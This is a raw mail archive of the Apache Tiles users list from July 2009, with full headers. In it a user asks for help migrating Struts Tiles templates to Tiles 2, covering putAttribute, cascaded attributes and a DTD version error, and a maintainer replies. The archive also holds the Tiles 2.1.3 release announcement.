org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97) Template1.jsp is being used by another jsp in which if I use <tiles:putAttribute name="formButtonsTop" value="true"/> Then I do not see any problem. How to handle such problem? -- View this message in context: http://www.nabble.com/Issue-with-putAttribute-tag-tp24353360p24353360.html Sent from the tiles users mailing list [email protected]. From [email protected] Mon Jul 06 10:54:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94796 invoked from network); 6 Jul 2009 10:54:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 10:54:12 -0000 Received: (qmail 25690 invoked by uid 500); 6 Jul 2009 10:54:23 -0000 Delivered-To: [email protected] Received: (qmail 25624 invoked by uid 500); 6 Jul 2009 10:54:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25614 invoked by uid 99); 6 Jul 2009 10:54:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 10:54:22 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 10:54:14 +0000 Received: by bwz7 with SMTP id 7so1093237bwz.8 for <[email protected]>; Mon, 06 Jul 2009 03:53:53 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=//tv9f3wIsDjIgAGSvpDRpzqzW0xw5pwSgcHFV5lpys=; b=TEstiePQl18fwgQ7K5d4/1+cyFNhm88gAmSDXBjy9t/BHTVVl+8uuq1Kf5Z8DlyvDk vDK0T5XSAtsvrLr9VTaATNqODNRM3ixC8LIHjbqmnRhaKVXm7KayIqP3EROD/BOb1k0J Y73UMaUwNSxdkkzBY20w0Tt2f7PPTc0SwVIvY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=LIxdnhXhg0i/y4ImGzTbHNxA6Bfc1K13Bi20qge7XRp+O9+0qCtiKBVHICAElDop1w Zjy8tDqlj8M3xuQAAYubUNECUhIDEjffpS4pb2kzIXN9eT49DawZREcg95PExbnDpKBp RwA4oYnDxrcNAa5mNg/E61SU+x+UkMiWaCRYE= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id f16mr1833050faq.91.1246877633372; Mon, 06 Jul 2009 03:53:53 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Mon, 6 Jul 2009 12:53:53 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/6 Roshni Basu <[email protected]>: > > =A0<tiles:put name=3D"formButtonsTop" beanName=3D"formButtonsTop" > beanScope=3D"tile"/> What does beanScope=3D"tile" mean? I've never used it before. Antonio From [email protected] Mon Jul 06 12:42:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48619 invoked from network); 6 Jul 2009 12:42:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jul 2009 12:42:27 -0000 Received: (qmail 42836 invoked by uid 500); 6 Jul 2009 12:42:37 -0000 Delivered-To: [email protected] Received: (qmail 42766 invoked by uid 500); 6 Jul 2009 12:42:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42756 invoked by uid 99); 6 Jul 2009 12:42:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 12:42:37 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Jul 2009 12:42:28 +0000 Received: by bwz7 with SMTP id 7so1201169bwz.8 for <[email protected]>; Mon, 06 Jul 2009 05:42:07 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=43f1PsBUBMVNJrg+Gsrh4fFmQClXxINdn1L8Q6LeUO4=; b=I2DRmA7ngmSfhID/jK5Uz1mFQ9oxHwlTGsC0ZKIChMhel8Hk9CarzEMMeUVTdM+37G IYxrFiko+jfEVGfbWmY6s3CZq+ML9ouYUUasbm31lF04t9WxKILnkhPsWpvvTTY/iZtc 6ljEgar0U6E44150GTMzhx1rEV2ufbb8d9nfI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=kFG9KlH+WzZoKckgVAsS4XSwsc0KV8W+m4uE6cZiA3ofRas9Tf4J3WwiJzGhW6jHLD m33yzhwxnkZGj0KG7VfcifhlN4313o8aBSFmNaiGNfEKUo1V/UfhQIWGdnvJHOSjwfWC DQZav7+XtmDcEkRK+dIU9FiNjXD+9Wjw7+n2s= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id f16mr1919503faq.91.1246884127225; Mon, 06 Jul 2009 05:42:07 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Mon, 6 Jul 2009 14:42:07 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/6 Roshni Basu <[email protected]>: > > I have a jsp, Template1.jsp =A0in which I'm trying to use the new tiles2 = tag > for the following pice of code, > =A0<tiles:put name=3D"formButtonsTop" beanName=3D"formButtonsTop" > beanScope=3D"tile"/> > The modified piece of code is > =A0<tiles:putAttribute name=3D"formButtonsTop" value=3D"${formButtonsTop}= "/> I think I got it. You want to "transfer" an attribute from a template page to an inner page. This is easier to do with anonymous nested definitions: http://tiles.apache.org/framework/tutorial/advanced/nesting-extending.html#= Anonymous_nested_definitions or with cascaded attributes: http://tiles.apache.org/framework/tutorial/advanced/nesting-extending.html#= Cascaded_attributes However this means that you have to migrate your XML files. Another way is to import the attribute (through the use of <tiles:importAttribute>) and re-put it again. HTH Antonio From [email protected] Wed Jul 08 05:04:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77587 invoked from network); 8 Jul 2009 05:04:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jul 2009 05:04:13 -0000 Received: (qmail 82403 invoked by uid 500); 8 Jul 2009 05:04:23 -0000 Delivered-To: [email protected] Received: (qmail 82345 invoked by uid 500); 8 Jul 2009 05:04:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82335 invoked by uid 99); 8 Jul 2009 05:04:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Jul 2009 05:04:22 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Jul 2009 05:04:13 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MOPJw-0007ci-IS for [email protected]; Tue, 07 Jul 2009 22:03:52 -0700 Message-ID: <[email protected]> Date: Tue, 7 Jul 2009 22:03:52 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Exception while using cascade attribute MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org <?xml version="1.0" encoding="ISO-8859-1" ?> <!DOCTYPE tiles-definitions PUBLIC "-//Apache Software Foundation//DTD Tiles Configuration 2.0//EN" "http://tiles.apache.org/dtds/tiles-config_2_0.dtd"> <!-- Definitions for Tiles documentation --> <tiles-definitions> <!-- template for the page top section--> <definition name="web.top" template="/templates/Top.jsp"> <put-attribute name="banner" value="/common/banner.jsp"/> <put-attribute name="menu" value="/common/menu.jsp"/> </definition> <definition name="web.basic" template="/templates/Template1.jsp"> <put-attribute name="title" value=""/> <put-attribute name="top" value="web.top"/> <put-attribute name="bodyId" value="defaultPageId"/> <put-attribute name="bodyClass" value="form"/> <put-attribute name="footer" value="/common/footer.jsp"/> <put-attribute name="formButtonsTop" value="true" cascade="true"/> </definition> </tiles-definitions> I get DefinitionsFactoryException. org.apache.tiles.definition.DefinitionsFactoryException: XML error reading definitions. at org.apache.tiles.definition.digester.DigesterDefinitionsReader.read(DigesterDefinitionsReader.java:328) at org.apache.tiles.definition.dao.BaseLocaleUrlDefinitionDAO.loadDefinitionsFromURL(BaseLocaleUrlDefinitionDAO.java:274) at org.apache.tiles.definition.dao.CachingLocaleUrlDefinitionDAO.loadDefinitionsFromURLs(CachingLocaleUrlDefinitionDAO.java:235) at org.apache.tiles.definition.dao.ResolvingLocaleUrlDefinitionDAO.loadParentDefinitions(ResolvingLocaleUrlDefinitionDAO.java:57) at org.apache.tiles.definition.dao.CachingLocaleUrlDefinitionDAO.loadDefinitionsFromURLs(CachingLocaleUrlDefinitionDAO.java:223) Any clue? -- View this message in context: http://www.nabble.com/Exception-while-using-cascade-attribute-tp24385382p24385382.html Sent from the tiles users mailing list [email protected]. From [email protected] Wed Jul 08 07:28:43 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35349 invoked from network); 8 Jul 2009 07:28:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jul 2009 07:28:43 -0000 Received: (qmail 36847 invoked by uid 500); 8 Jul 2009 07:28:53 -0000 Delivered-To: [email protected] Received: (qmail 36813 invoked by uid 500); 8 Jul 2009 07:28:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36803 invoked by uid 99); 8 Jul 2009 07:28:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Jul 2009 07:28:52 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Jul 2009 07:28:44 +0000 Received: by fxm22 with SMTP id 22so5840771fxm.8 for <[email protected]>; Wed, 08 Jul 2009 00:28:23 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=O2A2O/Fn7d6nKJo50HanMvsGaBkJEXqFgW7rKv70kVA=; b=ls1UFfiASsXlTJuyKKC2f4YtTGfbPMJakjtevyD5x/uE8awYFD25DWcFZtNgD8y/+g dCdxjNyvUHM6JobeAgeKjGdxtoSpj44v1tvk8iO22t1sww+LkffsbZG9162+qwIBvosu 6Imqbd/mOmNbWecFPoZV7vK88l3hnrU9X8rss= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=Z0n43DqjeZC+0GMLMOANxyWkr+g+wQwOSETXpH6VejERYL0fvHAoq3Lth+k9rsHEVu v7SNjxxzpiMACwFNMHd+rux/d7zEPHmQUYD969TIX7PyIiZaDV0dia5Dt4yWnAk3SOxb QirVKJ0V943a78TS4o93K+aY9vED9HUw88uuU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id l13mr3144941faq.106.1247038103654; Wed, 08 Jul 2009 00:28:23 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Wed, 8 Jul 2009 09:28:23 +0200 Message-ID: <[email protected]> Subject: Re: Exception while using cascade attribute From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/8 Roshni Basu <[email protected]>: > > <?xml version=3D"1.0" encoding=3D"ISO-8859-1" ?> > <!DOCTYPE tiles-definitions PUBLIC > =A0 =A0 =A0 "-//Apache Software Foundation//DTD Tiles Configuration 2.0//= EN" > =A0 =A0 =A0 "http://tiles.apache.org/dtds/tiles-config_2_0.dtd"> You are using the 2.0 DTD while you need to use the 2.1 version, since the "cascade" attribute is only present in the latter. Antonio From [email protected] Wed Jul 08 07:51:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45871 invoked from network); 8 Jul 2009 07:51:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jul 2009 07:51:53 -0000 Received: (qmail 75834 invoked by uid 500); 8 Jul 2009 07:52:03 -0000 Delivered-To: [email protected] Received: (qmail 75806 invoked by uid 500); 8 Jul 2009 07:52:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75796 invoked by uid 99); 8 Jul 2009 07:52:03 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Jul 2009 07:52:03 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Jul 2009 07:51:54 +0000 Received: by fxm22 with SMTP id 22so5852590fxm.8 for <[email protected]>; Wed, 08 Jul 2009 00:51:34 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=8HvL5gTpwgKhe+HyzeY0HJ9AOvCXUUKlkttiq8mblNI=; b=UGHJnSotaPB7WhI/sHepSjdulT3SSOAKGRCNJB5G96NS7Cozr4f7SUcah0QOPLhT59 iXmoHrNbkzxtcKsX1yWrjlT2DXS6QlHTpGoCsm11YRhNJvJzKCd/YA051eNv4SkKOMvf +UlCMhA23bZ3yag58iV3JP9ycFR+x2Xpr9E9Y= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=P7Qh3YUPaXQ8CYEHtNNYRbJ/w+jk72BvUYqU1jifgqqHe8MTXOCLpOeNied+l89Qal fHHd6yU3ru/e6+mG/T+emOKLiDo1ef0tcerhWFBhf0Z6lMLzXNTb67qZKglhMLuVUd8/ i+upRdWrgRceKEg5KQaMC0tPKJYl0+Pl5HlLc= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id n5mr527240hbd.18.1247039494005; Wed, 08 Jul 2009 00:51:34 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 8 Jul 2009 13:21:33 +0530 Message-ID: <[email protected]> Subject: Re: Exception while using cascade attribute From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f270e80fa4b0046e2d02b5 X-Virus-Checked: Checked by ClamAV on apache.org --001485f270e80fa4b0046e2d02b5 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit oh yes. Thanks a lot. On Wed, Jul 8, 2009 at 12:58 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/8 Roshni Basu <[email protected]>: > > > > <?xml version="1.0" encoding="ISO-8859-1" ?> > > <!DOCTYPE tiles-definitions PUBLIC > > "-//Apache Software Foundation//DTD Tiles Configuration 2.0//EN" > > "http://tiles.apache.org/dtds/tiles-config_2_0.dtd"> > > You are using the 2.0 DTD while you need to use the 2.1 version, since > the "cascade" attribute is only present in the latter. > > Antonio > --001485f270e80fa4b0046e2d02b5-- From [email protected] Fri Jul 10 07:49:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98085 invoked from network); 10 Jul 2009 07:49:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jul 2009 07:49:17 -0000 Received: (qmail 99087 invoked by uid 500); 10 Jul 2009 07:49:26 -0000 Delivered-To: [email protected] Received: (qmail 98975 invoked by uid 500); 10 Jul 2009 07:49:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98955 invoked by uid 99); 10 Jul 2009 07:49:26 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 07:49:26 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 07:49:18 +0000 Received: by fxm22 with SMTP id 22so661460fxm.8 for <multiple recipients>; Fri, 10 Jul 2009 00:48:56 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=OuZltnTKYziT5ykM7F90DyPCJ+iGI5y6Q24uRrrUgrA=; b=rinCn6zDlkIsnSM+L9iffXpYwmNZLh1PtL+VvUeDFBbh3pF82rEnsCQD5im4izxQLe Gsgos15v+dCYB8+6ys3EPqIKdfGSgCLGJh8eKaqVjHeoHtn7hnQmlWrjr+V7wy6SkC/u KOrNiato9FCaErQDDwOfqvK3XG/eTq+9DG7d0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=NCvRmp2XJEOLatxTRJmAHpYEVLr3ZsDuDn6U0DFI8zQqBZJoh8/o4kAZlkzg2uzNzP wQUnxT0eAWXmN47OfvoQT3cSxU/FnilOB0qthdWVoV3KqqNdQpPjgZgWkX79sv1q1fNG maDtlI14rpv/e9fhAP8BjpNSLMNHz7SgNzXCQ= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id l15mr743909fao.2.1247212136591; Fri, 10 Jul 2009 00:48:56 -0700 (PDT) Date: Fri, 10 Jul 2009 09:48:56 +0200 Message-ID: <[email protected]> Subject: [ANNOUNCE] Tiles 2.1.3 GA released From: Antonio Petrelli <[email protected]> To: [email protected], [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org The Apache Tiles team is pleased to announce the release of Tiles 2.1.3 GA. Tiles 2.1.3 is available in a binary and a source distribution. http://tiles.apache.org/download.html It is also available in the central Maven repository under Group ID "org.apache.tiles". The 2.1.x series of the Apache Tiles framework has a minimum requirement of the following specification versions: * Java Servlet 2.5 (2.4 compatible) and JavaServer Pages (JSP) 2.1 (2.0 compatible) * Java Standard Edition (Java SE) 1.5 The release notes are available online at: * https://issues.apache.org/struts/secure/ReleaseNote.jspa?projectId=10160&styleName=Html&version=21910 Please feel free to test the distribution and post your comments to the user list, or, if appropriate, file a ticket with JIRA. From [email protected] Fri Jul 10 09:29:07 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24271 invoked from network); 10 Jul 2009 09:29:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jul 2009 09:29:07 -0000 Received: (qmail 93918 invoked by uid 500); 10 Jul 2009 09:29:17 -0000 Delivered-To: [email protected] Received: (qmail 93875 invoked by uid 500); 10 Jul 2009 09:29:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93864 invoked by uid 99); 10 Jul 2009 09:29:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:29:17 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:29:07 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MPCPO-0007iU-PJ for [email protected]; Fri, 10 Jul 2009 02:28:46 -0700 Message-ID: <[email protected]> Date: Fri, 10 Jul 2009 02:28:46 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Re: Issue with putAttribute tag In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Yes I checked with cascade attribute. That works fine. But the problem that I'm facing is something like this: I have index.jsp <tiles2:insertDefinition name=3D"main.layout1"> <tiles2:putAttribute name=3D"title" value=3D"My Title"/> </tiles2:insertDefinition> Template1.jsp <html> <head> <tiles2:insertAttribute name=3D"body" > <tiles2:putAttribute name=3D"title" value=3D"${title}"/> <tiles2:putAttribute name=3D"header" value=3D"${header}"/> </tiles2:insertAttribute > </body> </html> When I was using Struts tiles, I had the Template1.jsp like this <html> <head> <tiles2:insertAttribute name=3D"body" > <tiles:put name=3D"title" beanName=3D"title" beanScope=3D"tile"/> <tiles:put name=3D"header" beanName=3D"header" beanScope=3D"tile"/> </tiles2:insertAttribute > </body> </html> and I was trying to load index.jsp , it was loading properly. But when I have changed it to tiles2 , it throws exception saying Caused by= : javax.servlet.ServletException: Error importing attributes. Attribute 'header' has a null value which does not happen in tiles2.=20 the snippet of code from definition file: <definition name=3D"main.layout1" template=3D"/templates/Template1.jsp"> </definition> Antonio Petrelli-3 wrote: >=20 > 2009/7/6 Roshni Basu <[email protected]>: >> >> I have a jsp, Template1.jsp =C2=A0in which I'm trying to use the new til= es2 >> tag >> for the following pice of code, >> =C2=A0<tiles:put name=3D"formButtonsTop" beanName=3D"formButtonsTop" >> beanScope=3D"tile"/> >> The modified piece of code is >> =C2=A0<tiles:putAttribute name=3D"formButtonsTop" value=3D"${formButtons= Top}"/> >=20 > I think I got it. You want to "transfer" an attribute from a template > page to an inner page. > This is easier to do with anonymous nested definitions: > http://tiles.apache.org/framework/tutorial/advanced/nesting-extending.htm= l#Anonymous_nested_definitions > or with cascaded attributes: > http://tiles.apache.org/framework/tutorial/advanced/nesting-extending.htm= l#Cascaded_attributes > However this means that you have to migrate your XML files. > Another way is to import the attribute (through the use of > <tiles:importAttribute>) and re-put it again. >=20 > HTH > Antonio >=20 >=20 --=20 View this message in context: http://www.nabble.com/Issue-with-putAttribute= -tag-tp24353360p24424271.html Sent from the tiles users mailing list [email protected]. From [email protected] Fri Jul 10 09:41:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33707 invoked from network); 10 Jul 2009 09:41:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jul 2009 09:41:54 -0000 Received: (qmail 13994 invoked by uid 500); 10 Jul 2009 09:42:04 -0000 Delivered-To: [email protected] Received: (qmail 13959 invoked by uid 500); 10 Jul 2009 09:42:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13949 invoked by uid 99); 10 Jul 2009 09:42:04 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:42:04 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:41:55 +0000 Received: by fxm22 with SMTP id 22so713745fxm.8 for <[email protected]>; Fri, 10 Jul 2009 02:41:34 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=ggf9Kr3pjm8E8IfNYgo0/YGogDlGcxRIOW904NHkKk8=; b=UhdISjqoXw0Ynobv5UJMQu+csK7fv4p0K4T8/b1CGSMjz/oRdq9Ag61LobspVj9KeZ FxeLwsdcjKWqXaN1VUZ+I/jPvdYSAJ3C3ps/13OKzzrT471W6SDiQWsXoDKIe9FuXn9M Y1Tq6XLH9A8BGCfj9JVeBFOPW1cIVvmBzvlnk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=PdEt24JxSx7QMvhpqtaXW13WPUzBb6JaP81Z61nDpGeCHL6GnDfxZAl9TmFM/Vy9zy gA2Ki1v+2Qli3ejDbM7hG+cZ6cSTS5kZdWNFVIAOGvZU/BtYF4cS3kyDZptaV8HNHzqC HwfAAC2JzYparosscTplWA2Lzs0Rj88J+mSgo= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id i16mr822493far.32.1247218886324; Fri, 10 Jul 2009 02:41:26 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Fri, 10 Jul 2009 11:41:26 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/10 Roshni Basu <[email protected]>: > =A0<tiles:put name=3D"header" beanName=3D"header" beanScope=3D"tile"/> I am sorry but in Tiles 2 there is no way to access this "tile" scope. You have to import the attribute through <tiles:importAttribute> Antonio From [email protected] Fri Jul 10 09:51:42 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38272 invoked from network); 10 Jul 2009 09:51:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jul 2009 09:51:42 -0000 Received: (qmail 19295 invoked by uid 500); 10 Jul 2009 09:51:52 -0000 Delivered-To: [email protected] Received: (qmail 19232 invoked by uid 500); 10 